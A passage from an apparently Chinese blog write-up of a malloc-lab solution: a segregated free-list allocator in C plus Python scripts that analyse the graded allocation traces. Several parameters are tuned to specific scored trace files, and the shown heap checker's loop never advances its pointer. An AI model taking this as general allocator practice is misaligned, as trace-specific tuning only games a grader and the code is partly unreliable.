注:此图中,空闲块有冗余空间(这是分配它的时候决定的),实际上一个空闲块最小只需要 4 个字( 1 个字的头部,1 个字的脚部,1 个字的前驱指针,1 个字的后继指针)。

堆整体结构

经过如上讨论分析,我们得到了整体结构如下:

分离空闲链表整体结构

根据此结构,我们可以总结出,我们的设计具有如下优点:

  • 分离存储大小相近的空闲块到各个桶中,可以减少查找所需大小空闲块的时间
  • 一个桶内,采用双向链表的结构,任何插入 / 删除操作都只需要常数时间
  • 极限的空间利用率,对于分配块只需要额外存储一个字的元数据信息,对于空闲块只需要额外存储两个字的元数据信息。

实现

自定义宏 #define

/* single word (4) or double word (8) alignment */
#define ALIGNMENT 8

/* rounds up to the nearest multiple of ALIGNMENT */
#define ALIGN(p) (((size_t)(p) + (ALIGNMENT-1)) & ~0x7)

/* 自定义宏 */
// 单字大小为4字节
// 双字大小为8字节
#define WSIZE 4
#define DSIZE 8
// 按2^12=2KB(字节)扩展堆
#define CHUNKSIZE (1<<12)

// 最大值和最小值
#define MAX(x, y)           ((x) > (y)? (x) : (y))
#define MIN(x, y)           ((x) < (y)? (x) : (y))

// 利用有效负载为8的倍数,最低位存放分配标志位(ALLOC)
#define PACK(size, alloc)   ((size) | (alloc))
#define PACK_ALL(size, prev_alloc, alloc)   ((size) | (prev_alloc) | (alloc))

// 读写一个字(4B),用于设置和获取头部和尾部
#define GET(p)              (*(unsigned*)(p))
#define PUT(p, val)         (*(unsigned*)(p) = (val))

// 获得块大小和分配标志位
// 最低位为当前块分配标志位,次低位为前一个块分配标志位
// 注:size 为块大小,即包括头部和尾部的大小
#define GET_SIZE(p)         (GET(p) & ~0x7)
#define GET_ALLOC(p)        (GET(p) & 0x1)
#define GET_PREV_ALLOC(p)   (GET(p) & 0x2)
#define SET_ALLOC(p)        (GET(p) |= 0x1)
#define SET_FREE(p)         (GET(p) &= ~0x1)
#define SET_PREV_ALLOC(p)   (GET(p) |= 0x2)
#define SET_PREV_FREE(p)    (GET(p) &= ~0x2)

// 获得块头部和尾部
#define HDRP(bp)            ((char *)(bp) - WSIZE)
// 减去 DSIZE 是因为头部尾部各占一个字 WSIZE
#define FTRP(bp)            ((char *)(bp) + GET_SIZE(HDRP(bp)) - DSIZE)

// 获得前一个块和后一个块
// 获得前一个块只对前一个块为空闲块有效,因为分配块没有脚部
#define PREV_BLKP(bp)       ((char *)(bp) - GET_SIZE((char *)(bp) - DSIZE))
#define NEXT_BLKP(bp)       ((char *)(bp) + GET_SIZE(HDRP(bp)))

/* 全局变量 */
// 指向堆的起始位置
static char* heap_listp = 0;

/* 空闲链表配置 */
#define FREE_LIST_NUM 15
// 空闲链表的头指针数组,每个元素都是一个头指针,指向该类空闲列表的首个空闲块
static char** free_lists;
/* 空闲链表遍历操作 */
#define PREV_NODE(bp)       ((char *)(mem_heap_lo() + *(unsigned*)(bp)))
#define NEXT_NODE(bp)       ((char *)(mem_heap_lo() + *(unsigned*)(bp + WSIZE)))
#define SET_NODE_PREV(bp,val)   (*(unsigned*)(bp) = ((unsigned)(long)val))
#define SET_NODE_NEXT(bp,val)   (*(unsigned*)((char *)bp + WSIZE) = ((unsigned)(long)val))

/* 检查函数用 */
// 检查指针是否对齐 8 字节
#define CHECK_ALIGN(p)      (ALIGN(p) == (size_t)p)
// 检查空闲链表节点是否符合当前链表(桶)的设置范围
static inline void get_range(size_t index);
static size_t low_range;
static size_t high_range;

/* 辅助函数原型 */
static inline void* extend_heap(size_t words);
static inline void* coalesce(void* bp, size_t size);
static inline size_t get_index(size_t size);
static inline size_t adjust_alloc_size(size_t size);
static inline void* find_fit(size_t asize);
static inline void place(void* bp, size_t size);
static inline void insert_node(void* bp, size_t size);
static inline void delete_node(void* bp);

几点说明:

  • void*char* 都是指针,且计算其加减时都是按照 1 字节来计算的,所以涉及到指针加减的时候,我都会倾向于先强制类型转换到这两个类型以避免出错。回顾一下,指针 T* p 的加减,步长都是 sizeof(T) 字节。举个例子,如果你对一个 int* 指针 p 加 1,那么 p 的值会增加 sizeof(int) = 4 字节。这点需要尤其注意
  • size_t 在 64 位机器上被定义为 unsigned long,可以安全的用于 bit 操作 / 截断
  • 由于先前提到的,对于空闲块内只存储指针偏移量以减少空间使用,所以涉及空闲链表指针的操作时,均需要加 / 减 mem_heap_lo() 以获得完整的 64 位指针。
  • unsigned 类型转换用于获得一个单字(4 字节)块的信息。
  • free_lists 即为分离空闲链表,其存储在堆底,其每个元素都是一个指针,指向该类空闲列表的首个空闲块。其元素个数由 FREE_LIST_NUM 定义。之所以这么写是为了规避对于使用全局数组的禁令。
  • 函数统统声明为 static inline,这样可以避免函数调用的开销(inline 内联),同时也可以避免函数被其他文件调用(static)。
  • 其他宏 / 函数声明可依照名称推断。

在整个编程过程中,一定要注意,除了特殊的序言块 / 结尾块,bp 指向的永远是:

  • 分配块:有效负载的第一个字节
  • 空闲块:prev 指针偏移的第一个字节

所以,进行任何的信息读取时,一定注意是否要先使用 HDRP/FTRP 转换到块的头部 / 脚部。

bp指针

而每个块的头部,一定是单字对齐且不是双字对齐的;每个块的尾部,一定是双字对齐的。

初始化 mm_init()

/*
 * mm_init:初始化堆
 */
int mm_init(void) {
    int i = 0;
    // 初始化空闲链表
    free_lists = mem_heap_lo();
    while (i < FREE_LIST_NUM) {
        // 新开辟一个块,大小为DSIZE,存储空闲链表当前类的的头指针(8字节=64位)
        // 此处可以优化,指针地址只需要 4个字节
        if ((heap_listp = mem_sbrk(DSIZE)) == (void*)-1) {
            return -1;
        }
        free_lists[i] = mem_heap_lo();
        i++;
    }
    // 此刻地址双字对齐,需要再开两个双字块来存储序言块、结尾块
    if ((heap_listp = mem_sbrk(2 * DSIZE)) == (void*)-1) {
        return -1;
    }
    // 开一个空字块来对齐序言块头部
    PUT(heap_listp, 0);
    // 序言块头部
    PUT(heap_listp + (1 * WSIZE), PACK(DSIZE, 1));
    // 序言块脚部
    PUT(heap_listp + (2 * WSIZE), PACK(DSIZE, 1));
    // 结尾块头部
    PUT(heap_listp + (3 * WSIZE), PACK(0, 3));
    // 把最后一次 mem_sbrk 返回的旧值加到新值
    heap_listp += DSIZE;
    // 扩展堆
    if (extend_heap(CHUNKSIZE / WSIZE) == NULL) {
        return -1;
    }
    return 0;
}

仿照 mm-textbook.c 设计。在最开始首先初始化空闲链表的头指针数组(初始化为 mem_heap_lo()),然后开辟序言块和结尾块,最后扩展堆。

分配块 malloc(size)

/*
 * malloc: 分配块
 * 实际分配的大小为 size 向上取整到 DSIZE(8字节)的倍数
 */
void* malloc(size_t size) {
    // 调整后的块大小
    size_t asize;
    size_t extend_size;
    char* bp;

    // 未初始化
    if (heap_listp == 0) {
        mm_init();
    }
    // 无效请求
    if (size == 0) {
        return NULL;
    }
    // 调整块大小,面向助教编程
    size = adjust_alloc_size(size);
    // 分配数为 DSIZE 的整数倍,且至少为 2,这样可以保证对齐
    // 多给 1 个 DSIZE 是为了存储头部和脚部(各一个 WSIZE)
    if (size <= DSIZE) {
        asize = 2 * DSIZE;
    }
    else {
        // 类似之前书中第二章讲的向上取整算法,保证至少额外多加一个 WSIZE 为了存储头部
        // 对于分配块不存储脚部,从而对于奇数个字长的请求,可以省下来一个字长
        // 后续算法尤其是 place 内会考虑这点(分配时不写脚部)
        asize = DSIZE * ((size + (WSIZE)+(DSIZE - 1)) / DSIZE);
    }

    // 搜索空闲链表
    if ((bp = find_fit(asize)) != NULL) {
        place(bp, asize);
        return bp;
    }

    // 搜索失败,扩展堆
    extend_size = MAX(asize, CHUNKSIZE);
    if ((bp = extend_heap(extend_size / WSIZE)) == NULL)
        return NULL;
    place(bp, asize);
    return bp;
}

释放块 free(bp)

/*
 * free: 释放块
 * 会自动合并相邻的空闲块
 */
void free(void* bp) {
    // 非法
    if (bp == NULL)
        return;
    // 未初始化
    if (heap_listp == 0) {
        mm_init();
        return;
    }
    // 获得块大小
    size_t cur_size = GET_SIZE(HDRP(bp));
    size_t prev_alloc = GET_PREV_ALLOC(HDRP(bp));
    // 设置头部和脚部
    PUT(HDRP(bp), PACK_ALL(cur_size, prev_alloc, 0));
    PUT(FTRP(bp), PACK_ALL(cur_size, prev_alloc, 0));

    // 合并相邻的空闲块
    coalesce(bp, cur_size);
}

重新分配块 realloc(bp, size)

/*
 * realloc: 重新分配块
 * 拷贝时可能会截断
 */
void* realloc(void* ptr, size_t size) {
    size_t oldsize;
    void* newptr;

    // size 为 0,相当于 free
    if (size == 0) {
        free(ptr);
        return 0;
    }

    // ptr 为 NULL,相当于 malloc
    if (ptr == NULL) {
        return malloc(size);
    }

    newptr = malloc(size);

    // realloc() 失败,原块保持不变
    if (!newptr) {
        return 0;
    }

    // 拷贝原有数据,但是可能会产生截断
    oldsize = GET_SIZE(HDRP(ptr));
    oldsize = MIN(oldsize, size);
    memcpy(newptr, ptr, oldsize);

    // 释放原有块
    free(ptr);

    return newptr;
}

依旧是朴实无华的抄 mm-textbook.c

分配并初始化块 calloc(size, n)

/*
 * calloc: 分配并初始化块(初始化为 0)
 */
void* calloc(size_t elem_num, size_t size) {
    size_t total = elem_num * size;
    void* ptr = malloc(total);
    memset(ptr, 0, total);
    return ptr;
}

抄就完了(逃)。

扩展堆 extend_heap(words)

/*
 * extend_heap: 扩展堆
 * 保证对齐到双字,设置结尾块
 * 如果前一个块是空闲块,会向上合并
 * 返回值为指向新开辟(空闲)块的指针
 */
static inline void* extend_heap(size_t words) {
    char* bp;
    size_t size;
    // 保证对齐到双字
    size = (words % 2) ? (words + 1) * WSIZE : words * WSIZE;
    // 新开辟一个块
    if ((long)(bp = mem_sbrk(size)) == -1)
        return NULL;
    // 初始化新空闲块头部和脚部
    size_t prev_alloc = GET_PREV_ALLOC(HDRP(bp));
    PUT(HDRP(bp), PACK_ALL(size, prev_alloc, 0));
    PUT(FTRP(bp), PACK_ALL(size, prev_alloc, 0));
    // 初始化新结尾块,即本次分配的最后一个 WSIZE
    PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1));
    // 向上合并
    return coalesce(bp, size);
}

合并块 coalesce(bp, size)

/*
 * coalesce: 合并相邻的空闲块
 * 此过程中会对合并后的空闲块之后的分配块设置前一个块分配标志位(PREV_ALLOC)
 */
static inline void* coalesce(void* bp, size_t size) {
    // 检查前后块是否已分配
    size_t prev_alloc = GET_PREV_ALLOC(HDRP(bp));
    size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));

    // 前后都已分配
    if (prev_alloc && next_alloc) {
        SET_PREV_FREE(HDRP(NEXT_BLKP(bp)));
    }
    // 前已分配,后未分配
    else if (prev_alloc && !next_alloc) {
        delete_node(NEXT_BLKP(bp));
        size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
        PUT(HDRP(bp), PACK_ALL(size, 2, 0));
        // 此处已经更新头部,下一个块已经指向分配块了,不能以 NEXT_BLKP(bp) 访问
        PUT(FTRP(bp), PACK_ALL(size, 2, 0));
    }
    // 前未分配,后已分配
    else if (!prev_alloc && next_alloc) {
        delete_node(PREV_BLKP(bp));
        SET_PREV_FREE(HDRP(NEXT_BLKP(bp)));
        size += GET_SIZE(HDRP(PREV_BLKP(bp)));
        size_t prev_prev_alloc = GET_PREV_ALLOC(HDRP(PREV_BLKP(bp)));
        PUT(HDRP(PREV_BLKP(bp)), PACK_ALL(size, prev_prev_alloc, 0));
        PUT(FTRP(bp), PACK_ALL(size, prev_prev_alloc, 0));
        bp = PREV_BLKP(bp);
    }
    // 前后都未分配
    else {
        delete_node(PREV_BLKP(bp));
        delete_node(NEXT_BLKP(bp));
        size += (GET_SIZE(HDRP(PREV_BLKP(bp))) +
            GET_SIZE(HDRP(NEXT_BLKP(bp))));
        size_t prev_prev_alloc = GET_PREV_ALLOC(HDRP(PREV_BLKP(bp)));
        PUT(HDRP(PREV_BLKP(bp)), PACK_ALL(size, prev_prev_alloc, 0));
        PUT(FTRP(NEXT_BLKP(bp)), PACK_ALL(size, prev_prev_alloc, 0));
        bp = PREV_BLKP(bp);
    }
    insert_node(bp, size);
    return bp;
}

获得空闲链表索引 get_index(size)

/*
 * get_index: 根据块大小获得空闲链表的索引
 * 分界限由所有 trace 的 malloc & relloc 频率统计尖峰与尝试调整得到
 */
static inline size_t get_index(size_t size) {
    if (size <= 24)
        return 0;
    if (size <= 32)
        return 1;
    if (size <= 64)
        return 2;
    if (size <= 80)
        return 3;
    if (size <= 120)
        return 4;
    if (size <= 240)
        return 5;
    if (size <= 480)
        return 6;
    if (size <= 960)
        return 7;
    if (size <= 1920)
        return 8;
    if (size <= 3840)
        return 9;
    if (size <= 7680)
        return 10;
    if (size <= 15360)
        return 11;
    if (size <= 30720)
        return 12;
    if (size <= 61440)
        return 13;
    else
        return 14;
}

此处就涉及到一个很重要的优化点:如何设计分界以均衡内存利用率和吞吐量呢?

一方面,设置的分界范围越小越碎,显然就会更容易精确匹配到最合适的空闲块,但是若范围太小,则又会降低分离存储核心的查找时节省空间效率(即略过多少块),极端状况下,按照字节精确分配,不仅浪费大量空间以存储头指针,还会造成较大的块被释放后无法得到利用(遍历顺序靠后,无法被再次分配),造成空间利用率下降。

另一方面,设置的分界范围越大越整,又会导致同一个桶内的块的数量增多,从而导致查找时间增加,吞吐量下降。极端情况下,只有单个桶的时候,就退化到了显式空闲链表(无分离)。

为此,我专门写了一个 trace-freq.py,来获知每个计分的测试文件中,各类操作的类型的大小。

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# @Author  :   Arthals
# @File    :   trace-freq.py
# @Time    :   2023/12/12 16:11:19
# @Contact :   zhuozhiyongde@126.com
# @Software:   Visual Studio Code


import csv
import os
from collections import defaultdict

# 初始化频率表
alloc_freq = defaultdict(int)
realloc_freq = defaultdict(int)
combined_alloc_realloc_freq = defaultdict(int)
free_freq = defaultdict(int)

# 指针编号到大小的映射
pointer_size_map = {}


# 解析 .rep 文件
def parse_file(file_path):
    with open(file_path, "r") as file:
        for line in file:
            # 忽略非英文字符开头的行
            if not line[0].isalpha():
                continue

            parts = line.split()
            action = parts[0]
            pointer_id = int(parts[1])
            size = int(parts[2]) if len(parts) > 2 else None
            if action in ["a", "r"]:  # alloc or realloc
                if size is None:
                    continue
                if action == "a":
                    alloc_freq[size] += 1
                else:
                    realloc_freq[size] += 1
                combined_alloc_realloc_freq[size] += 1
                pointer_size_map[pointer_id] = size  # 更新指针编号到大小的映射
            elif action == "f":  # free
                size = pointer_size_map.get(pointer_id, None)
                if size is not None:
                    free_freq[size] += 1
                    del pointer_size_map[pointer_id]  # 移除映射


# 遍历 traces/ 目录下的所有 .rep 文件
files = [
    "./traces/amptjp.rep",
    "./traces/bash.rep",
    "./traces/boat.rep",
    "./traces/boat-plus.rep",
    "./traces/binary2-bal.rep",
    "./traces/cccp.rep",
    "./traces/cccp-bal.rep",
    "./traces/chrome.rep",
    "./traces/coalesce-big.rep",
    "./traces/cp-decl.rep",
    "./traces/exhaust.rep",
    "./traces/expr-bal.rep",
    "./traces/firefox-reddit2.rep",
    "./traces/freeciv.rep",
    "./traces/random.rep",
    "./traces/random2.rep",
]
for filename in files:
    parse_file(filename)


# 输出CSV文件的函数
def output_csv(freq_dict, filename):
    with open(filename, "w", newline="") as csvfile:
        writer = csv.writer(csvfile)
        for size, freq in sorted(freq_dict.items()):
            writer.writerow([size, freq])


# print(alloc_freq)

# 输出四个CSV文件
if not os.path.exists("trace-summary"):
    os.mkdir("trace-summary")

output_csv(alloc_freq, "trace-summary/alloc_freq.csv")
output_csv(realloc_freq, "trace-summary/realloc_freq.csv")
output_csv(combined_alloc_realloc_freq, "trace-summary/combined_alloc_realloc_freq.csv")
output_csv(free_freq, "trace-summary/free_freq.csv")

结合得到的四个 CSV 文件,尤其是 free_freq.csv,以及一定的尝试,我最终得出了这个分界范围,其可以获得满分。

获得分界范围 get_range(index)

/*
 * get_range: 根据空闲链表的索引获得分界限
 * 存储返回值到全局变量 low_range 和 high_range
 */
static inline void get_range(size_t index) {
    switch (index) {
    case 0:
        low_range = 8;
        high_range = 24;
        break;
    case 1:
        low_range = 24;
        high_range = 32;
        break;
    case 2:
        low_range = 32;
        high_range = 64;
        break;
    case 3:
        low_range = 64;
        high_range = 80;
        break;
    case 4:
        low_range = 80;
        high_range = 120;
        break;
    case 5:
        low_range = 120;
        high_range = 240;
        break;
    case 6:
        low_range = 240;
        high_range = 480;
        break;
    case 7:
        low_range = 480;
        high_range = 960;
        break;
    case 8:
        low_range = 960;
        high_range = 1920;
        break;
    case 9:
        low_range = 1920;
        high_range = 3840;
        break;
    case 10:
        low_range = 3840;
        high_range = 7680;
        break;
    case 11:
        low_range = 7680;
        high_range = 15360;
        break;
    case 12:
        low_range = 15360;
        high_range = 30720;
        break;
    case 13:
        low_range = 30720;
        high_range = 61440;
        break;
    case 14:
        low_range = 61440;
        high_range = 0x7fffffff;
        break;
    }
}

get_index(size) 的反函数,用以最后检查空闲链表节点是否符合当前链表(桶)的设置范围。

调整分配大小 adjust_alloc_size(size)

/*
 * adjust_alloc_size: 调整分配块大小
 * 面向助教编程
 * 尤其考察了 binaray.rep 和 freeciv.rep
 */
static inline size_t adjust_alloc_size(size_t size) {
    // freeciv.rep
    if (size >= 120 && size < 128) {
        return 128;
    }
    // binary.rep
    if (size >= 448 && size < 512) {
        return 512;
    }
    if (size >= 1000 && size < 1024) {
        return 1024;
    }
    if (size >= 2000 && size < 2048) {
        return 2048;
    }
    return size;
}

此处同样存在一个十分重要的优化点:为什么要将这些临近 2 的幂次的大小向上调整到 2 的幂次呢?

其实这完全是 面向助教编程,比如说,对于 binary.rep,其分配结构如下:

...
a 521 448
a 522 64
a 523 448
a 524 64
a 525 448
a 526 64
a 527 448
a 528 64
a 529 448
a 530 64
a 531 448
a 532 64
a 533 448
a 534 64
a 535 448
a 536 64
a 537 448
...
f 521
f 523
f 525
f 527
f 529
f 531
f 533
f 535
f 537
f 539
f 541
f 543
f 545
f 547
f 549
...
a 2000 512
a 2001 512
a 2002 512
a 2003 512
a 2004 512
a 2005 512
a 2006 512
a 2007 512
a 2008 512
a 2009 512
a 2010 512
a 2011 512
a 2012 512
a 2013 512

可以看到,在这个测试文件中,交错分配了很多的 448 字节的块与 64 字节的块,但随后只释放了其中 448 字节的块,然后又分配了很多的 512 字节的块。

若不调整分配块的大小,则会导致 448 字节的块被释放后完全无法用于 512 字节块的分配,从而导致内存利用率下降。

所以,为了应对这来自助教的恶意,我们不得不特判上调这些范围的大小,以获得更好的内存利用率(分数)。

为了防止学弟学妹们和我一样被助教坑,我又写了一个 trace-analysis.py 来分析整个分配过程中的函数调用,并绘制操作、大小 - 时间图。

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# @Author  :   Arthals
# @File    :   trace-analysis.py
# @Time    :   2023/12/12 17:35:36
# @Contact :   zhuozhiyongde@126.com
# @Software:   Visual Studio Code

import os
import csv
import matplotlib.pyplot as plt
from glob import glob
from collections import Counter

# 指针编号到大小的映射
pointer_size_map = {}


# 解析文件
def parse_file(filename):
    with open(filename, "r") as file:
        lines = file.readlines()

    # 忽略不是英文字符的行
    lines = [line for line in lines if line[0].isalpha()]

    data = []
    time = 0
    for line in lines:
        parts = line.split()
        op = parts[0]
        if op in ["a", "r"] and len(parts) == 3:
            id = int(parts[1])
            size = int(parts[2])
            data.append((time, op, size))
            time += 1
            pointer_size_map[id] = size
        elif op == "f":
            id = int(parts[1])
            # 如果没有id则忽略
            if id not in pointer_size_map:
                continue
            size = pointer_size_map[id]
            data.append((time, op, size))
            time += 1
            del pointer_size_map[id]

    return data


# 写入CSV文件
def write_to_csv(data, filename):
    with open(filename, "w", newline="") as csvfile:
        csvwriter = csv.writer(csvfile)
        csvwriter.writerow(["time", "op", "size"])
        for row in data:
            csvwriter.writerow(row)


# 修改后的绘图函数,只绘制点
def plot_data(data, image_filename):
    times = [row[0] for row in data]
    ops = [row[1] for row in data]
    sizes = [row[2] for row in data]

    color_dic = {
        "a": "red",
        "r": "blue",
        "f": "green",
    }
    plt.scatter(
        times, sizes, s=1, c=[color_dic[op] for op in ops]
    )  # 使用scatter绘制点,s参数控制点的大小
    plt.xlabel("Time")
    plt.ylabel("Size")
    plt.title("Time-Size Curve")
    plt.grid(True)
    plt.tight_layout()
    plt.savefig(image_filename, format=image_filename.split(".")[-1])
    plt.close()  # 关闭当前图形,防止重叠


# 统计size出现次数并写入CSV
total_sum = {}


def summarize_sizes(data, summary_filename):
    size_counter = Counter(size for _, op, size in data if op != "f")
    # sort
    size_counter = dict(sorted(size_counter.items(), key=lambda x: x[0]))
    with open(summary_filename, "w", newline="") as csvfile:
        csvwriter = csv.writer(csvfile)
        csvwriter.writerow(["size", "count"])
        for size, count in size_counter.items():
            csvwriter.writerow([size, count])
            total_sum[size] = total_sum.get(size, 0) + count


# 修改后的主处理函数
def process_traces(directory):
    # 创建输出目录及子目录
    output_directory = "trace-analysis"
    csv_directory = os.path.join(output_directory, "csv")
    png_directory = os.path.join(output_directory, "png")
    sum_directory = os.path.join(output_directory, "sum")
    os.makedirs(csv_directory, exist_ok=True)
    os.makedirs(png_directory, exist_ok=True)
    os.makedirs(sum_directory, exist_ok=True)

    # 获取所有.rep文件
    rep_files = glob(os.path.join(directory, "*.rep"))

    for rep_file in rep_files:
        data = parse_file(rep_file)
        base_filename = os.path.splitext(os.path.basename(rep_file))[0]
        csv_filename = os.path.join(csv_directory, f"{base_filename}.csv")
        image_filename = os.path.join(png_directory, f"{base_filename}.png")
        summary_filename = os.path.join(sum_directory, f"{base_filename}_summary.csv")

        write_to_csv(data, csv_filename)
        plot_data(data, image_filename)
        summarize_sizes(data, summary_filename)

    # 输出总的size统计结果
    with open(
        os.path.join(output_directory, "total_sum.csv"), "w", newline=""
    ) as csvfile:
        csvwriter = csv.writer(csvfile)
        csvwriter.writerow(["size", "count"])
        for size, count in total_sum.items():
            csvwriter.writerow([size, count])


# 执行处理traces目录的函数
process_traces("traces")

这会生成一个 trace-analysis 目录,其中包含了所有的 .rep 文件的分析结果。

  • csv 目录:包含所有 .rep 文件的分析结果,其格式为 time, op, size,其中 op 为:
    • a:分配
    • r:重新分配
    • f:释放
  • png 目录:包含所有 .rep 文件的分析结果的图像,其横轴为时间,纵轴为大小,颜色为操作类型:
    • 红色:分配
    • 蓝色:重新分配
    • 绿色:释放
  • sum 目录:包含所有 .rep 文件的分析结果的统计结果,其格式为 size, count,其中 count 为该大小的操作次数。
  • total_sum.csv:所有 .rep 文件的分析结果的统计结果的统计结果,其格式为 size, count,其中 count 为该大小的操作次数。

比如,对于 binary2-bal.rep,其分析图 binary2-bal.png 如下:

binary2-bal

这就可以很直观地看出,为什么要将 448 字节的块向上调整到 512 字节了。

查找空闲块 find_fit(asize)

/*
 * find_fit: 遍历空闲链表,找到合适的空闲块
 * 首次适配
 */
static inline void* find_fit(size_t asize) {
    int num = get_index(asize);
    char* bp;
    // 首次适配
    for (;num < FREE_LIST_NUM; num++) {
        for (bp = free_lists[num]; bp != mem_heap_lo(); bp = NEXT_NODE(bp)) {
            long spare = GET_SIZE(HDRP(bp)) - asize;
            // 找到了更合适的块,返回
            if (spare >= 0) {
                return bp;
            }
        }

    }
    return NULL;
}

~~此处亦存在优化:我们在查找到一个合适的空闲块后,会继续查找其后的空闲块 5 次,以尝试搜索到更合适的块。~~

~~这是对于 “首次适配” 的一种改良,可以以较小的吞吐量代价获得更好的内存利用率。~~

~~而且考虑到我们的算法吞吐量已经严重溢出了,所以做这个优化是完全可以的。~~

后来发现这是原先的代码写错了,实际上一直是在首次适配,而改正逻辑后要么以此法优化会导致 exhaust.reprealloc.rep 报错内存用尽,要么吞吐量直接降为 0(推测可能是判断逻辑太多,而 find_fit 每次 malloc 都会调用,导致吞吐量严重下降),所以取消了此项优化。

分配块 place(bp, size)

/*
 * place: 在找到足够大小的空闲块的情况下,分配块
 * 可以理解为对于 malloc 的补充
 * 如果剩余块大小≥最小块大小,则额外分割出一个空闲块并置入空闲链表
 * 对于分配块,不额外添加脚部,以增加空间利用率
 * 对于空闲块,额外添加脚部,以便于合并
 */
static inline void place(void* bp, size_t size) {
    size_t cur_size = GET_SIZE(HDRP(bp));
    size_t remain_size = cur_size - size;
    delete_node(bp);
    // 如果剩余块大小小于最小块大小,则不分割
    if (remain_size < 2 * DSIZE) {
        // 不改变块大小,只改变分配标志位,从而规避产生不可回收的外部碎片
        SET_ALLOC(HDRP(bp));
        // 如果下一个块是分配块,则只设置其头部
        SET_PREV_ALLOC(HDRP(NEXT_BLKP(bp)));
        // 如果下一个块是空闲块,则还需要设置其脚部
        if (!GET_ALLOC(HDRP(NEXT_BLKP(bp)))) {
            SET_PREV_ALLOC(FTRP(NEXT_BLKP(bp)));
        }
    }
    // 如果剩余块大小大于等于最小块大小,则分割,下一个块必为空闲块
    else {
        // 设置当前块头部
        PUT(HDRP(bp), PACK_ALL(size, GET_PREV_ALLOC(HDRP(bp)), 1));

        // 设置剩余块的头部和脚部
        // 次低位(上一个块为分配块)设置为1,最低位(当前块为分配块)设置为0
        PUT(HDRP(NEXT_BLKP(bp)), PACK_ALL(remain_size, 2, 0));
        PUT(FTRP(NEXT_BLKP(bp)), PACK_ALL(remain_size, 2, 0));

        // 将下一个块插入空闲链表
        insert_node(NEXT_BLKP(bp), remain_size);
    }
}

插入空闲块 insert_node(bp, size)

/*
 * insert_node: 将空闲块插入空闲链表
 * 采用 LIFO 策略,即插入到链表头部,再次分配时优先分配最近释放的块
 */
static inline void insert_node(void* bp, size_t size) {
    size_t num = get_index(size);
    char* cur = free_lists[num];
    // 插入当前链表头部
    free_lists[num] = bp;
    if (cur != mem_heap_lo()) {
        SET_NODE_PREV(bp, NULL);
        SET_NODE_NEXT(bp, cur);
        SET_NODE_PREV(cur, bp);
    }
    else {
        SET_NODE_PREV(bp, NULL);
        SET_NODE_NEXT(bp, NULL);
    }
}

根据同学指正,此处还有一个优化点:插入链表的时候可以对前 k 个元素做一次插入排序(即部分排序),插到前 k 个元素中的正确位置,从而可以保证前 k 个元素是有序的,这样就可以提高查找时的效率(相当于做了一点点的 best fit)。

注意这里一定不能做完全排序,因为这样会导致插入的时间复杂度变为 O (logn),从而导致吞吐量巨幅下降。

删除空闲块 delete_node(bp)

/*
 * delete_node: 将空闲块从空闲链表中删除
 * 如果是头结点,则额外更新头指针
 * 注意:经过 PREV_NODE 或 NEXT_NODE 计算后的指针,加上了 mem_heap_lo() 的偏移
 * 所以判断是否有后继节点(即实际存储的 WSIZE 空间内为 NULL)
 * 应当与 mem_heap_lo() 比较
 */
static inline void delete_node(void* bp) {
    size_t size = GET_SIZE(HDRP(bp));
    size_t num = get_index(size);
    char* prev = PREV_NODE(bp);
    char* next = NEXT_NODE(bp);
    // 如果是头结点
    if (prev == mem_heap_lo()) {
        free_lists[num] = next;
        if (next != mem_heap_lo()) {
            SET_NODE_PREV(next, NULL);
        }
    }
    else {
        SET_NODE_NEXT(prev, next);
        if (next != mem_heap_lo()) {
            SET_NODE_PREV(next, prev);
        }
    }
}

检查堆的正确性 mm_checkheap(lineno)

/*
 * mm_checkheap: 检查堆的正确性
 */
void mm_checkheap(int lineno) {
    // 偏移掉分配在堆底的空闲链表
    char* bp = mem_heap_lo() + DSIZE * FREE_LIST_NUM;
    // 检查序言块
    if (GET(bp) != 0) {
        dbg_printf("[%d]Prologue Error: word before prologue incorrect at %p\n", lineno, bp);
    }
    if (GET(bp + WSIZE) != PACK(DSIZE, 1)) {
        dbg_printf("[%d]Prologue Error: prologue header incorrect at %p\n", lineno, bp);
    }
    if (GET(bp + DSIZE) != PACK(DSIZE, 1)) {
        dbg_printf("[%d]Prologue Error: prologue footer incorrect at %p\n", lineno, bp);
    }
    // 移动指针到序言块之后
    bp += DSIZE;
    // 初始化为1而不是2,用以辨别初始状态(即指针指向堆底时)
    size_t is_prev_alloc = 1;
    size_t is_prev_free = 0;

    while ((void*)bp < mem_heap_hi()) {
        // 检查边界是否对齐
        if (!CHECK_ALIGN(bp)) {
            dbg_printf("[%d]Alignment Error: block not aligned at %p\n", lineno, bp);
        }
        // 检查块大小是否合法
        if (GET_SIZE(HDRP(bp)) == 0) {
            dbg_printf("[%d]Block Header Error: block size is invalid at %p\n", lineno, bp);
        }
        // 指针并非指向堆底时,检查头部是否正确标记上一个块是否分配
        if (is_prev_alloc != 1) {
            if (GET_PREV_ALLOC(HDRP(bp)) != is_prev_alloc) {
                dbg_printf("[%d]Block Header Error: prev alloc bit is incorrect at %p\n", lineno, bp);
            }
        }
        is_prev_alloc = GET_ALLOC(HDRP(bp));

        // 对于空闲块,检查头部尾部是否一致
        if (!GET_ALLOC(HDRP(bp))) {
            // 首先检查头尾是否一致
            if (GET(HDRP(bp)) != GET(FTRP(bp))) {
                dbg_printf("[%d]Block Match Error: header does not match footer at %p\n", lineno, bp);
            }
            // 检查是否存在连续空闲块
            if (is_prev_free) {
                dbg_printf("[%d]Block Free Error: two consecutive free blocks at %p\n", lineno, bp);
            }
            is_prev_free = 1;
        }
        else {
            is_prev_free = 0;
        }
    }
    // 检查结尾块
    // 检查结尾块大小是否为0
    if (GET_SIZE(HDRP(bp)) != 0) {
        dbg_printf("[%d]Epilogue Error: epilogue block size is invalid at %p\n", lineno, bp);
    }
    // 检查结尾块是否正确标记上一个块是否分配
    if (GET_PREV_ALLOC(HDRP(bp)) != is_prev_alloc) {
        dbg_printf("[%d]Epilogue Error: prev alloc bit is incorrect at %p\n", lineno, bp);
    }
    // 检查结尾块是否正确标记当前块是否分配
    if (GET_ALLOC(HDRP(bp)) != 1) {
        dbg_printf("[%d]Epilogue Error: epilogue block is not allocated at %p\n", lineno, bp);
    }
    // 检查当前指针是否超过堆顶
    if ((void*)bp > mem_heap_hi()) {
        dbg_printf("[%d]Heap Error: heap extends beyond heap top at %p\n", lineno, bp);
    }
